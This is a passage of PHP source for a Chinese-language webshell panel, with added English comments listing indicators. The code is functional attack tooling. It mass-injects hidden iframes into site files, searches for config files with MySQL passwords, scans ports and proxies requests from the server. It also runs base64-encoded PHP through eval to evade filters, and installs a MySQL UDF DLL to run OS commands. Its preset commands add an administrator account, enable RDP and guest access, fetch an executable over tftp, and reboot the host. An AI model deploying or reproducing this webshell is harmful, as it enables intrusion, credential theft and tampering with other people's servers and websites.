2627 newcell.innerHTML=\"<input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'>\"
2628}
2629
2630function delTank() {
2631 if(tank.rows.length==1) return;
2632 var checkit = false;
2633 for (var i=0;i<document.all.tankNo.length;i++) {
2634 if (document.all.tankNo[i].checked) {
2635 checkit=true;
2636 tank.deleteRow(i+1);
2637 i--;
2638 }
2639 }
2640 if (checkit) {
2641 } else{
2642 alert(\"请选择一个要删除的对象\");
2643 return false;
2644 }
2645}
2646</SCRIPT>
2647<br><br>
2648<table cellSpacing=0 cellPadding=0 width=\"100%\" border=0>
2649 <tr>
2650 <td width=\"7%\"><input class=\"button01\" type=\"button\" onclick=\"addTank()\" value=\" 添 加 \" name=\"button2\"/>
2651 <input name=\"button3\" type=\"button\" class=\"button01\" onClick=\"delTank()\" value=\"删除\" />
2652 </td>
2653 </tr>
2654</table>
2655<table id=\"tank\" width=\"100%\" border=\"0\" cellpadding=\"1\" cellspacing=\"1\" >
2656<tr><td>请选择要上传的文件:</td></tr>
2657<tr><td><input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'></td></tr>
2658</table>");
2659 html_n("<br><input type=\"submit\" name=\"upfiles\" value=\"上传\" style=\"width:80px;\"> <input type=\"button\" value=\"返回\" onclick=\"window.location='?eanver=main&path=" . root_dir . "';\" style=\"width:80px;\">");
2660 if (isset($_POST['upfiles'])) {
2661 foreach ($_FILES["upfile"]["error"] as $key => $error) {
2662 if ($error == UPLOAD_ERR_OK) {
2663 $tmp_name = $_FILES["upfile"]["tmp_name"][$key];
2664 $name = $_FILES["upfile"]["name"][$key];
2665 $uploadfile = str_path($_POST['uppath'] . '/' . $name);
2666 $upload = @copy($tmp_name, $uploadfile) ? $name . $msg[2] : @move_uploaded_file($tmp_name, $uploadfile) ? $name . $msg[2] : $name . $msg[3];
2667 echo "<br><br>" . $upload;
2668 }
2669 }
2670 }
2671 html_n("</form>");
2672 break;
2673 case "guama":
2674 $patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
2675 $typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
2676 $codet = isset($_POST['code']) ? $_POST['code'] : "<iframe src=\"http://localhost/eanver.htm\" width=\"1\" height=\"1\"></iframe>";
2677 html_n("<tr><td>文件类型请用\"|\"隔开,也可以是指定文件名.<form method=\"POST\"><br>");
2678 html_input("text", "path", $patht, "路径范围", "45");
2679 html_input("checkbox", "pass", "", "使用目录遍历", "", true);
2680 html_input("text", "type", $typet, "<br><br>文件类型", "60");
2681 html_text("code", "67", "5", $codet);
2682 html_n("<br><br>");
2683 html_radio("批量挂马", "批量清马", "guama", "qingma");
2684 html_input("submit", "passreturn", "开始");
2685 html_n("</td></tr></form>");
2686 if (!empty($_POST['path'])) {
2687 html_n("<tr><td>目标文件:<br><br>");
2688 if (isset($_POST['pass'])) {
2689 $bool = true;
2690 } else {
2691 $bool = false;
2692 }
2693 do_passreturn($patht, $codet, $_POST['return'], $bool, $typet);
2694 }
2695 break;
case "tihuan":
    // Bulk find-and-replace across files under a directory ("tihuan" = replace).
    // Both strings and the root path are taken from POST unfiltered; the panel text
    // itself warns that this is destructive.
    $newcode = isset($_POST['newcode']) ? $_POST['newcode'] : "";
    $oldcode = isset($_POST['oldcode']) ? $_POST['oldcode'] : "";
    html_n("<tr><td>此功能可批量替换文件内容,请小心使用.<br><br><form method=\"POST\">");
    html_input("text", "path", root_dir, "路径范围", "45");
    // 'pass' checkbox = recurse into subdirectories.
    html_input("checkbox", "pass", "", "使用目录遍历", "", true);
    // NOTE(review): the first textarea is named 'newcode' and the second 'oldcode',
    // with the label "替换为" ("replace with") between them - which one is the search
    // string and which the replacement depends on do_passreturn(), defined elsewhere.
    html_text("newcode", "67", "5", $newcode);
    html_n("<br><br>替换为");
    html_text("oldcode", "67", "5", $oldcode);
    html_input("submit", "passreturn", "替换", "<br><br>");
    html_n("</td></tr></form>");
    if (!empty($_POST['path'])) {
        html_n("<tr><td>目标文件:<br><br>");
        if (isset($_POST['pass'])) {
            $bool = true;
        } else {
            $bool = false;
        }
        // Mode is hard-coded to "tihuan"; the 5th argument is the second string.
        do_passreturn($_POST['path'], $_POST['newcode'], "tihuan", $bool, $_POST['oldcode']);
    }
    break;
case "scanfile":
    // File search panel: find files by name ("scanfile") or by contained text
    // ("scancode"). The panel text states the purpose: locating CMS config files that
    // hold MySQL credentials, to feed the privilege-escalation panels further down.
    $code = isset($_POST['code']) ? $_POST['code'] : "";
    // css_js() is defined elsewhere; presumably emits the Fulll() JS helper referenced
    // by the <select> below.
    css_js("4");
    html_n("<tr><td>此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.<br>当服务器文件太多时,会影响执行速度,不建议使用目录遍历.<form method=\"POST\" name=\"sform\"><br>");
    html_input("text", "path", root_dir, "路径名", "45");
    // 'pass' checkbox = recurse into subdirectories (the panel text discourages this
    // on large trees because of the time it takes).
    html_input("checkbox", "pass", "", "使用目录遍历", "", true);
    html_input("text", "code", $code, "<br><br>关键字", "40");
    // Preset list of well-known CMS / forum products whose config-file names the JS
    // fills into the keyword box (dedecms and phpcms appear twice in the original).
    html_select(array("--MYSQL配置文件--", "Discuz", "PHPWind", "phpcms", "dedecms", "PHPBB", "wordpress", "sa-blog", "o-blog", "dedecms", "phpcms"), 0, "onchange='return Fulll(options[selectedIndex].value)'");
    html_n("<br><br>");
    // Radio pair: search file names vs. search file contents; read back as 'return'.
    html_radio("搜索文件名", "搜索包含文字", "scanfile", "scancode");
    html_input("submit", "passreturn", "搜索");
    html_n("</td></tr></form>");
    if (!empty($_POST['path'])) {
        html_n("<tr><td>找到文件:<br><br>");
        if (isset($_POST['pass'])) {
            $bool = true;
        } else {
            $bool = false;
        }
        // Shared directory walker, defined elsewhere; mode comes from the radio value.
        do_passreturn($_POST['path'], $_POST['code'], $_POST['return'], $bool);
    }
    break;
case "scanphp":
    // "Find other webshells" panel: scans a directory for script files matching a set
    // of signatures ("特征码") so the operator can remove competing backdoors. The
    // panel text tells the operator to inspect hits before deleting them.
    html_n("<tr><td>原理是根据特征码定义的,请查看代码判断后再进行删除.<form method=\"POST\"><br>");
    html_input("text", "path", root_dir, "查找范围", "40");
    html_input("checkbox", "pass", "", "使用目录遍历<br><br>脚本类型", "", true);
    // Script type to scan for. The <select>'s name is set inside html_select()
    // (defined elsewhere); the value is read back below as $_POST['class'].
    html_select(array("php" => "PHP", "asp" => "ASP", "aspx" => "ASPX", "jsp" => "JSP"));
    html_input("submit", "passreturn", "查找", "<br><br>");
    html_n("</td></tr></form>");
    if (!empty($_POST['path'])) {
        html_n("<tr><td>找到文件:<br><br>");
        // 'pass' checkbox = recurse into subdirectories.
        if (isset($_POST['pass'])) {
            $bool = true;
        } else {
            $bool = false;
        }
        // Mode hard-coded to "scanphp"; the signature matching lives in do_passreturn().
        do_passreturn($_POST['path'], $_POST['class'], "scanphp", $bool);
    }
    break;
case "port":
    // TCP connect scan launched from the web server: for every '|'-separated port,
    // attempt fsockopen() to the POSTed host with a 2-second timeout and report
    // open/closed. Defender note: this turns the web host into the source of internal
    // recon traffic - look for bursts of short-lived connects from the web server to
    // the default port list (SMB 139/445, MSSQL 1433, MySQL 3306, RDP 3389, ...).
    $Port_ip = isset($_POST['ip']) ? $_POST['ip'] : "127.0.0.1";
    $Port_port = isset($_POST['port']) ? $_POST['port'] : "21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873";
    // Form values are echoed back into the HTML unescaped.
    html_n("<form method=\"POST\">
<div class=\"actall\">扫描IP <input type=\"text\" name=\"ip\" value=\"" . $Port_ip . "\" style=\"width:600px;\"> </div>
<div class=\"actall\">端口号 <input type=\"text\" name=\"port\" value=\"" . $Port_port . "\" style=\"width:597px;\"></div>
<div class=\"actall\"><input type=\"submit\" value=\"扫描\" style=\"width:80px;\"></div>
</form>");
    if ((!empty($_POST['ip'])) && (!empty($_POST['port']))) {
        echo "<div class=\"actall\">";
        $ports = explode('|', $_POST['port']);
        for ($i = 0; $i < count($ports); $i++) {
            // "Open" simply means the connect succeeded within 2 s; errors are
            // suppressed and $errno/$errstr are never shown. The socket is not
            // fclose()'d, so each open handle lives until the script ends.
            $fp = @fsockopen($_POST['ip'], $ports[$i], $errno, $errstr, 2);
            echo $fp ? "<font color=\"#00ff00\">开放端口: " . $ports[$i] . "</font><br>" : "关闭端口: " . $ports[$i] . "<br>";
            // Stream each result to the browser immediately rather than waiting
            // for the whole scan (the script runs inside an output buffer).
            ob_flush();
            flush();
        }
        echo "</div>";
    }
    break;
case "getcode":
    // "Online proxy" panel: fetch an arbitrary URL from the server side and return the
    // raw body as the whole response. This is a server-side request forgery primitive:
    // file() honours PHP stream wrappers and nothing here restricts the scheme, so
    // besides http(s)/ftp targets (when allow_url_fopen is on) it will also read local
    // paths. The panel text notes that the target sees the web server as the client.
    if (isset($_POST['url'])) {
        $proxycontents = @implode('', @file($_POST['url']));
        // Keep an untouched copy in case the charset clean-up below empties the result.
        $proxycontents2 = $proxycontents;
        // TestUtf8() is defined elsewhere. For UTF-8 content, iconv utf-8 -> utf8//IGNORE
        // strips invalid byte sequences; other content is passed through unchanged.
        $proxycontents = @TestUtf8($proxycontents) ? @iconv("utf-8", "utf8//IGNORE", $proxycontents) : $proxycontents;
        if (empty($proxycontents)) {
            $proxycontents = $proxycontents2;
        }
        // The fetched body is emitted verbatim (no headers, no escaping) into the
        // proxyframe iframe; a falsy body is reported as a fetch failure.
        echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>获取 URL 内容失败</b></p></center></body>";
        exit;
    }
    html_n("<table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">
 <form method=\"POST\" target=\"proxyframe\">
 <tr class=\"firstalt\">
 <td align=\"center\"><b>在线代理</b></td>
 </tr>
 <tr class=\"secondalt\">
 <td align=\"center\" ><br><ul><li>用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.</li><li>用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.</li><li>用本功能浏览的 URL,在目标主机上留下的IP记录是 : " . $_SERVER['SERVER_NAME'] . "</li></ul></td>
 </tr>
 <tr class=\"firstalt\">
 <td align=\"center\" height=40 >URL: <input name=\"url\" value=\"\" type=\"text\" class=\"input\" size=\"100\" >
 <input name=\"\" value=\"浏览\" type=\"submit\" class=\"input\" size=\"30\" >
</td>
 </tr>
 <tr class=\"secondalt\">
 <td align=\"center\" ><iframe name=\"proxyframe\" frameborder=\"0\" width=\"765\" height=\"400\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"auto\" src=\"about:blank\"></iframe></td>
 </tr>
</form></table>");
    break;
case "phpcode":
    // Arbitrary PHP execution panel. The textarea is base64-encoded client-side before
    // submission (the panel text says this is to keep the payload from being blocked,
    // i.e. WAF evasion) and then decoded and eval()'d server-side.
    // Network indicator: a POST to this script with query string eanver=phpcode and a
    // base64-looking 'phpcode' body parameter.
    $phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
    // Anything other than the literal default is assumed to be base64 from the JS
    // below; it is decoded and HTML-escaped only so it can be redisplayed in the form.
    if ($phpcode != "phpinfo();") {
        $phpcode = htmlspecialchars(base64_decode($phpcode));
    }
    echo "<script language=\"javascript\">";
    // html_base() is defined elsewhere; presumably emits the base64encode() JS
    // function used by SubmitUrl() below.
    html_base();
    echo "function SubmitUrl(){
 document.getElementById('phpcode').value = base64encode(document.getElementById('phpcode').value);
 document.getElementById('sendcode').submit();
 }</script><tr><td><form method=\"POST\" id=\"sendcode\" >不用写<? ?>标签,此功能优化使用BASE64加密传送,防止恶意代码被拦,用了就知道<br><br><textarea COLS=\"120\" ROWS=\"35\" name=\"phpcode\" id=\"phpcode\">" . $phpcode . "</textarea><br><br><input type=\"button\" value=\"执行\" onclick=\"SubmitUrl();\" style=\"width:80px;\">";
    if (!empty($_POST['phpcode'])) {
        echo "<br><br>";
        // No validation of any kind: the decoded text runs with the web server's
        // privileges. stripslashes() presumably undoes magic_quotes_gpc escaping on
        // old PHP builds.
        eval(stripslashes(base64_decode($_POST['phpcode'])));
    }
    html_n("</form>");
    break;
case "myexp":
    // MySQL UDF privilege-escalation panel (Windows targets, per the default DLL path).
    // Flow: CREATE TABLE with one BLOB column -> INSERT the DLL bytes returned by
    // Mysql_shellcode() -> SELECT ... INTO DUMPFILE to write the DLL to disk ->
    // CREATE FUNCTION state ... SONAME to load it -> select state("cmd") to run OS
    // commands as the MySQL service account. INTO DUMPFILE needs the FILE privilege and
    // a directory the server will load plugins from; the panel text says "must be root".
    // Forensic indicators: table Envl_Temp_Tab, a UDF named 'state', the default file
    // C:/windows/mysqlDll.dll, and the preset account 'envl'/'envl' in the JS below.
    // Uses the mysql_* extension, which was removed in PHP 7.0.
    $MSG_BOX = "请先导出DLL,再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.";
    $info = "命令回显";
    $mhost = 'localhost';
    $muser = 'root';
    $mport = '3306';
    $mpass = '';
    $mdata = 'mysql';
    $mpath = "C:/windows/mysqlDll.dll";
    $sqlcmd = 'ver';
    if (isset($_POST['mhost']) && isset($_POST['muser'])) {
        $mhost = $_POST['mhost'];
        $muser = $_POST['muser'];
        $mpass = $_POST['mpass'];
        $mdata = $_POST['mdata'];
        $mport = $_POST['mport'];
        // File_Str() is defined elsewhere; presumably normalises path separators.
        $mpath = File_Str($_POST['mpath']);
        $sqlcmd = $_POST['sqlcmd'];
        $conn = @mysql_connect($mhost . ':' . $mport, $muser, $mpass);
        if ($conn) {
            @mysql_select_db($mdata);
            // Step 1 ("安装DLL" button): stage the DLL through a temp table.
            if ((!empty($_POST['outdll'])) && (!empty($_POST['mpath']))) {
                $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
                if (@mysql_query($query, $conn)) {
                    // Mysql_shellcode() is defined elsewhere and must return an SQL
                    // literal (the value is spliced into the INSERT unquoted).
                    $shellcode = Mysql_shellcode();
                    $query = "INSERT into Envl_Temp_Tab values (CONVERT(" . $shellcode . ",CHAR));";
                    if (@mysql_query($query, $conn)) {
                        // DUMPFILE writes the single BLOB value byte-for-byte to $mpath.
                        $query = "SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE '" . $mpath . "';";
                        if (@mysql_query($query, $conn)) {
                            // Register the UDF by bare file name (basename of $mpath).
                            $ap = explode('/', $mpath);
                            $inpath = array_pop($ap);
                            $query = "Create Function state returns string soname '" . $inpath . "';";
                            $MSG_BOX = @mysql_query($query, $conn) ? "安装DLL成功" : "安装DLL失败";
                        } else {
                            $MSG_BOX = "导出DLL文件失败";
                        }
                    } else {
                        $MSG_BOX = "写入临时表失败";
                    }
                    // The staging table is dropped whether or not the export worked;
                    // the DLL on disk and the UDF registration are left in place.
                    @mysql_query("DROP TABLE Envl_Temp_Tab;", $conn);
                } else {
                    $MSG_BOX = "创建临时表失败";
                }
            }
            // Step 2 ("执行" button): run the OS command through the loaded UDF.
            // $sqlcmd is interpolated into a double-quoted SQL string unescaped.
            if (!empty($_POST['runcmd'])) {
                $query = "select state(\"" . $sqlcmd . "\");";
                $result = @mysql_query($query, $conn);
                if ($result) {
                    $k = 0;
                    $info = null;
                    // NOTE(review): $infotmp is never initialised (undefined-variable
                    // notice on first append) and $k advances the column index on each
                    // row, so row N contributes column N; in practice state() returns a
                    // single row/column so only $row[0] matters.
                    while ($row = @mysql_fetch_array($result)) {
                        $infotmp .= $row[$k];
                        $k++;
                    }
                    $info = $infotmp;
                    $MSG_BOX = "执行成功";
                } else {
                    $MSG_BOX = "执行失败";
                }
            }
        } else {
            $MSG_BOX = "连接MYSQL失败";
        }
    }
    // Form plus a JS preset list of post-exploitation commands (add a local admin,
    // enable RDP/telnet, enable guest, tftp download, reboot, ...).
    html_n("<script language=\"javascript\">
function Fullm(i){
 Str = new Array(11);
 Str[0] = \"ver\";
 Str[1] = \"net user envl envl /add\";
 Str[2] = \"net localgroup administrators envl /add\";
 Str[3] = \"net start Terminal Services\";
 Str[4] = \"tasklist /svc\";
 Str[5] = \"netstat -ano\";
 Str[6] = \"ipconfig\";
 Str[7] = \"net user guest /active:yes\";
 Str[8] = \"copy c:/1.php d:/2.php\";
 Str[9] = \"tftp -i 127.0.0.1 get server.exe c:/server.exe\";
 Str[10] = \"net start telnet\";
 Str[11] = \"shutdown -r -t 0\";
 mform.sqlcmd.value = Str[i];
 return true;
}
</script>
<form id=\"mform\" method=\"POST\">
<div id=\"msgbox\" class=\"msgbox\">" . $MSG_BOX . "</div>
<center><div class=\"actall\">
地址 <input type=\"text\" name=\"mhost\" value=\"" . $mhost . "\" style=\"width:110px\">
端口 <input type=\"text\" name=\"mport\" value=\"" . $mport . "\" style=\"width:110px\">
用户 <input type=\"text\" name=\"muser\" value=\"" . $muser . "\" style=\"width:110px\">
密码 <input type=\"text\" name=\"mpass\" value=\"" . $mpass . "\" style=\"width:110px\">
库名 <input type=\"text\" name=\"mdata\" value=\"" . $mdata . "\" style=\"width:110px\">
</div><div class=\"actall\">
可加载路径 <input type=\"text\" name=\"mpath\" value=\"" . $mpath . "\" style=\"width:555px\">
<input type=\"submit\" name=\"outdll\" value=\"安装DLL\" style=\"width:80px;\"></div>
<div class=\"actall\">安装成功后可用 <br><input type=\"text\" name=\"sqlcmd\" value=\"" . $sqlcmd . "\" style=\"width:515px;\">
<select onchange=\"return Fullm(options[selectedIndex].value)\">
<option value=\"0\" selected>--命令集合--</option>
<option value=\"1\">添加管理员</option>
<option value=\"2\">设为管理组</option>
<option value=\"3\">开启远程桌面</option>
<option value=\"4\">查看进程和PID</option>
<option value=\"5\">查看端口和PID</option>
<option value=\"6\">查看IP</option>
<option value=\"7\">激活guest帐户</option>
<option value=\"8\">复制文件</option>
<option value=\"9\">ftp下载</option>
<option value=\"10\">开启telnet</option>
<option value=\"11\">重启</option>
</select>
<input type=\"submit\" name=\"runcmd\" value=\"执行\" style=\"width:80px;\">
<textarea style=\"width:720px;height:300px;\">" . $info . "</textarea>
</div></center>
</form>");
    break;
case "mysql_exec":
    // MySQL login form for the database browser. On a successful mysql_connect() the
    // credentials - including the plaintext password - are stored in four cookies for
    // six hours (no path/domain/Secure/HttpOnly arguments are passed), and the browser
    // is bounced to mysql_msg, which re-reads them on every request.
    // $envlpath is defined elsewhere in the file and prefixes the cookie names.
    $cookie_name_mysql = $envlpath . "mysql";
    // Already logged in (user cookie present): go straight to the browser.
    if (isset($_COOKIE[$cookie_name_mysql . "user"])) {
        die("<meta http-equiv=\"refresh\" content=\"0;URL=?eanver=mysql_msg\">");
    }
    if (isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass'])) {
        // Credentials are only persisted if they actually work.
        if (@mysql_connect($_POST['mhost'] . ':' . $_POST['mport'], $_POST['muser'], $_POST['mpass'])) {
            $cookietime = time() + 6 * 3600;
            setcookie($cookie_name_mysql . 'host', $_POST['mhost'], $cookietime);
            setcookie($cookie_name_mysql . 'port', $_POST['mport'], $cookietime);
            setcookie($cookie_name_mysql . 'user', $_POST['muser'], $cookietime);
            setcookie($cookie_name_mysql . 'pass', $_POST['mpass'], $cookietime);
            die("正在登陆,请稍候...<meta http-equiv=\"refresh\" content=\"0;URL=?eanver=mysql_msg\">");
        } else {
            echo "登陆失败";
        }
    }
    // Login form; defaults target the local root account with an empty password.
    html_n("<form method=\"POST\" name=\"oform\" id=\"oform\">
<div class=\"actall\">地址 <input type=\"text\" name=\"mhost\" value=\"localhost\" style=\"width:300px\"></div>
<div class=\"actall\">端口 <input type=\"text\" name=\"mport\" value=\"3306\" style=\"width:300px\"></div>
<div class=\"actall\">用户 <input type=\"text\" name=\"muser\" value=\"root\" style=\"width:300px\"></div>
<div class=\"actall\">密码 <input type=\"text\" name=\"mpass\" value=\"\" style=\"width:300px\"></div>
<div class=\"actall\"><input type=\"submit\" value=\"登陆\" style=\"width:80px;\"></div>
</form>");
    break;
case "mysql_msg":
    // MySQL database browser. Every request reconnects with the credentials stored in
    // cookies by the mysql_exec panel, then (depending on the query string) lists
    // databases, tables and rows, and performs INSERT/UPDATE/DELETE/DROP or runs free-form
    // SQL. All table and database names are spliced into SQL straight from $_GET; values
    // from POST get addslashes() at best. Uses the mysql_* extension (removed in PHP 7.0).
    $cookie_name_mysql = $envlpath . "mysql";
    $conn = @mysql_connect($_COOKIE[$cookie_name_mysql . 'host'] . ':' . $_COOKIE[$cookie_name_mysql . 'port'], $_COOKIE[$cookie_name_mysql . 'user'], $_COOKIE[$cookie_name_mysql . 'pass']);
    if ($conn) {
        // Client-side helpers: delete confirmation, SQL templates for the buttons,
        // and SubmitUrl(), which base64-encodes the free-form SQL before posting it.
        html_n("<script language=\"javascript\">
function Delok(msg,gourl)
{
 smsg = \"确定要删除[\" + unescape(msg) + \"]吗?\";
 if(confirm(smsg)){window.location = gourl;}
}
function Createok(ac)
{
 if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';
 if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
 if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
 return false;
}");
        // html_base() is defined elsewhere; presumably emits the base64encode() JS.
        html_base();
        html_n("function SubmitUrl(){
 document.getElementById('nsql').value = base64encode(document.getElementById('nsql').value);
 document.getElementById('gform').submit();
}
</script>");
        $BOOL = false;
        // Status line: who we are connected as, plus the server version.
        $MSG_BOX = "用户:" . $_COOKIE[$cookie_name_mysql . 'user'] . " 地址:" . $_COOKIE[$cookie_name_mysql . 'host'] . ':' . $_COOKIE[$cookie_name_mysql . 'port'] . " 版本:";
        $k = 0;
        $result = @mysql_query("select version();", $conn);
        while ($row = @mysql_fetch_array($result)) {
            $MSG_BOX .= $row[$k];
            $k++;
        }
        // Database list as links (names are emitted into the HTML unescaped).
        echo "<div class=\"actall\"> 数据库:";
        $result = @mysql_query("SHOW DATABASES", $conn);
        while ($db = @mysql_fetch_array($result)) {
            echo " [<a href=\"?eanver=mysql_msg&db=" . $db['Database'] . '">' . $db['Database'] . "</a>]";
        }
        echo "</div>";
        if (isset($_GET['db'])) {
            @mysql_select_db($_GET['db'], $conn);
            $textarea = "";
            $querya = "";
            $queryb = "";
            $queryc = "";
            // Free-form SQL: arrives base64-encoded (see SubmitUrl above) and is run
            // verbatim. $_POST['nsql'] is overwritten with the decoded text here and the
            // row-listing code further down relies on that.
            if (isset($_POST['nsql'])) {
                $_POST['nsql'] = base64_decode($_POST['nsql']);
                $textarea = $_POST['nsql'];
                $BOOL = true;
                $MSG_BOX = @mysql_query($_POST['nsql'], $conn) ? "执行成功" : "执行失败 " . @mysql_error();
            }
            // INSERT from the insert form: column names are the POST array keys
            // (unescaped), values are addslashes()'d and single-quoted.
            if (isset($_POST['insql']) && is_array($_POST['insql'])) {
                $query = "INSERT INTO " . $_GET['table'] . ' (';
                foreach ($_POST['insql'] as $var => $key) {
                    $querya .= $var . ',';
                    $queryb .= '\'' . addslashes($key) . '\',';
                }
                $query = $query . substr($querya, 0, -1) . ') VALUES (' . substr($queryb, 0, -1) . ');';
                $MSG_BOX = @mysql_query($query, $conn) ? "添加成功" : "添加失败 " . @mysql_error();
            }
            // UPDATE from the edit form. The WHERE clause is a client-supplied base64
            // hidden field (generated by the edit form below) appended verbatim.
            if (isset($_POST['upsql']) && is_array($_POST['upsql'])) {
                $query = 'UPDATE ' . $_GET['table'] . ' SET ';
                foreach ($_POST['upsql'] as $var => $key) {
                    $queryb .= $var . '=\'' . addslashes($key) . '\',';
                }
                $query = $query . substr($queryb, 0, -1) . ' ' . base64_decode($_POST['wherevar']) . ';';
                $MSG_BOX = @mysql_query($query, $conn) ? "修改成功" : "修改失败 " . @mysql_error();
            }
            // DELETE by row offset: re-select the row at LIMIT <del>,1 and delete every
            // row whose columns all equal the fetched values (so exact duplicates go too).
            if (isset($_GET['del'])) {
                $result = @mysql_query("SELECT * FROM " . $_GET['table'] . ' LIMIT ' . $_GET['del'] . ', 1;', $conn);
                $good = @mysql_fetch_assoc($result);
                $query = "DELETE FROM " . $_GET['table'] . ' WHERE ';
                foreach ($good as $var => $key) {
                    $queryc .= $var . '=\'' . addslashes($key) . '\' AND ';
                }
                $where = $query . substr($queryc, 0, -4) . ';';
                $MSG_BOX = @mysql_query($where, $conn) ? "删除成功" : "删除失败 " . @mysql_error();
            }
            $action = "?eanver=mysql_msg&db=" . $_GET['db'];
            // DROP TABLE straight from the query string.
            if (isset($_GET['drop'])) {
                $query = "Drop TABLE IF EXISTS " . $_GET['drop'] . ';';
                $MSG_BOX = @mysql_query($query, $conn) ? "删除成功" : "删除失败 " . @mysql_error();
            }
            // Build the form action so the free-form SQL box posts back to the same view.
            if (isset($_GET['table'])) {
                $action .= '&table=' . $_GET['table'];
                if (isset($_GET['edit'])) {
                    $action .= '&edit=' . $_GET['edit'];
                }
            }
            if (isset($_GET['insert'])) {
                $action .= '&insert=' . $_GET['insert'];
            }
            echo "<div class=\"actall\"><form method=\"POST\" action=\"" . $action . "\" name=\"gform\" id=\"gform\">";
            echo "<textarea name=\"nsql\" id=\"nsql\" style=\"width:500px;height:50px;\">" . $textarea . "</textarea> ";
            echo "<input type=\"button\" name=\"querysql\" value=\"执行\" onclick=\"SubmitUrl();\" style=\"width:60px;height:49px;\"> <input type=\"button\" value=\"创建表\" style=\"width:60px;height:49px;\" onclick=\"Createok('a')\"> <input type=\"button\" value=\"创建库\" style=\"width:60px;height:49px;\" onclick=\"Createok('b')\"> <input type=\"button\" value=\"删除库\" style=\"width:60px;height:49px;\" onclick=\"Createok('c')\"></form></div><div class=\"msgbox\" style=\"height:40px;\">" . $MSG_BOX . "</div><div class=\"actall\"><a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . '">' . $_GET['db'] . "</a> ---> ";
            if (isset($_GET['table'])) {
                echo "<a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . '&table=' . $_GET['table'] . '">' . $_GET['table'] . '</a> ';
                echo "[<a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . '&insert=' . $_GET['table'] . "\">插入</a>]</div>";
                if (isset($_GET['edit'])) {
                    // Edit view: one textarea per column for the row at offset <edit>,
                    // posting back to the table view (preserving the page number).
                    if (isset($_GET['p'])) {
                        $atable = $_GET['table'] . '&p=' . $_GET['p'];
                    } else {
                        $atable = $_GET['table'];
                    }
                    echo "<form method=\"POST\" action=\"?eanver=mysql_msg&db=" . $_GET['db'] . '&table=' . $atable . '">';
                    $result = @mysql_query("SELECT * FROM " . $_GET['table'] . ' LIMIT ' . $_GET['edit'] . ', 1;', $conn);
                    $good = @mysql_fetch_assoc($result);
                    $u = 0;
                    foreach ($good as $var => $key) {
                        // NOTE(review): unlike the delete path above, values are NOT
                        // addslashes()'d when building this WHERE clause.
                        $queryc .= $var . '=\'' . $key . '\' AND ';
                        $type = @mysql_field_type($result, $u);
                        $len = @mysql_field_len($result, $u);
                        echo "<div class=\"actall\">" . $var . " <font color=\"#FF0000\">" . $type . '(' . $len . ")</font><br><textarea name=\"upsql[" . $var . "]\" style=\"width:600px;height:60px;\">" . htmlspecialchars($key) . "</textarea></div>";
                        $u++;
                    }
                    // The row-identifying WHERE clause round-trips through the client as a
                    // base64 hidden field and is consumed unchecked by the UPDATE branch.
                    $where = 'WHERE ' . substr($queryc, 0, -4);
                    echo "<input type=\"hidden\" id=\"wherevar\" name=\"wherevar\" value=\"" . base64_encode($where) . "\"><div class=\"actall\"><input type=\"submit\" value=\"Update\" style=\"width:80px;\"></div></form>";
                } else {
                    // Table view: column headers, then a page of 20 rows.
                    $query = "SHOW COLUMNS FROM " . $_GET['table'];
                    $result = @mysql_query($query, $conn);
                    $fields = array();

                    $pagesize = 20;
                    // Row count is obtained by fetching the whole table - expensive on
                    // large tables.
                    $row_num = @mysql_num_rows(@mysql_query("SELECT * FROM " . $_GET['table'], $conn));
                    $numrows = $row_num;
                    $pages = intval($numrows / $pagesize);
                    if ($numrows % $pagesize) {
                        $pages++;
                    }
                    // Clamp the requested page to [1, $pages]; $_GET['p'] is rewritten in
                    // place because the links below read it back. $p is the row offset.
                    if (!isset($_GET['p'])) {
                        $p = 0;
                        $_GET['p'] = 1;
                    } else {
                        $p2 = ((int)$_GET['p']);
                        if ($p2 > $pages) {
                            $p2 = $pages;
                        } elseif ($p2 < 1) {
                            $p2 = 1;
                        }
                        $p = ($p2 - 1) * 20;
                        $_GET['p'] = $p2;
                    }
                    $page = $_GET['p'];
                    // $offset is computed but never used; the SELECT below uses $p.
                    $offset = $pagesize * ($page - 1);


                    echo "<table border=\"0\"><tr>";
                    echo "<td class=\"toptd\" style=\"width:70px;\" nowrap>操作</td>";
                    while ($row = @mysql_fetch_assoc($result)) {
                        array_push($fields, $row['Field']);
                        echo "<td class=\"toptd\" nowrap>" . $row['Field'] . "</td>";
                    }
                    echo "</tr>";
                    // If the free-form SQL just run looks like a filtered SELECT, re-run it
                    // to fill the grid instead of the default paged SELECT *.
                    $nsql = isset($_POST['nsql']) ? $_POST['nsql'] : "";
                    if (preg_match('/WHERE|LIMIT/', $nsql) && preg_match('/SELECT|FROM/', $nsql)) {
                        $query = $nsql;
                    } else {
                        $query = "SELECT * FROM " . $_GET['table'] . ' LIMIT ' . $p . ', 20;';
                    }
                    $result = @mysql_query($query, $conn);
                    // $v is the absolute row offset used by the edit/delete links.
                    $v = $p;
                    while ($text = @mysql_fetch_assoc($result)) {
